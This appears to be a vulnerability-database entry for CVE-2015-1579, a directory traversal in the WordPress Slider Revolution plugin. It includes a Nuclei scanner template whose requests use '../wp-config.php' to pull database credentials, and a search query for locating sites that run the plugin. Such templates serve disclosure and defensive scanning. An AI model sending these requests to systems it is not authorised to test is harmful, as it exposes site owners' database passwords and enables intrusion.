Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-1579
HistoryNov 21, 2021 - 11:30 a.m.

WordPress Slider Revolution - Local File Disclosure

2021-11-2111:30:25
ProjectDiscovery
github.com
16

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.3 Medium

AI Score

Confidence

Low

0.675 Medium

EPSS

Percentile

98.0%

Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.
id: CVE-2015-1579

info:
  name: WordPress Slider Revolution - Local File Disclosure
  author: pussycat0x
  severity: medium
  description: |
    Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.
  impact: |
    An attacker can read arbitrary files on the server, potentially exposing sensitive information.
  remediation: |
    Update the WordPress Slider Revolution plugin to the latest version to fix the vulnerability.
  reference:
    - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
    - https://cxsecurity.com/issue/WLB-2021090129
    - https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80
    - https://nvd.nist.gov/vuln/detail/CVE-2015-1579
    - https://wpvulndb.com/vulnerabilities/7540
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2015-1579
    cwe-id: CWE-22
    epss-score: 0.82302
    epss-percentile: 0.98398
    cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: elegant_themes
    product: divi
    framework: wordpress
    google-query: inurl:/wp-content/plugins/revslider
  tags: cve2015,cve,wordpress,wp-plugin,lfi,revslider,wp,wpscan,elegant_themes

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
      - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "'DB_NAME'"
          - "'DB_PASSWORD'"
          - "'DB_USER'"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009fcfcc25ab96536af2b8e2b1cae82b3f057a0f60ebf41c8d3f6f4bd029879ef302206acf0ff4e2fd19087e94cb9beb1a8add10fabd4a24597cdf7bd81207a40ae383:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.3 Medium

AI Score

Confidence

Low

0.675 Medium

EPSS

Percentile

98.0%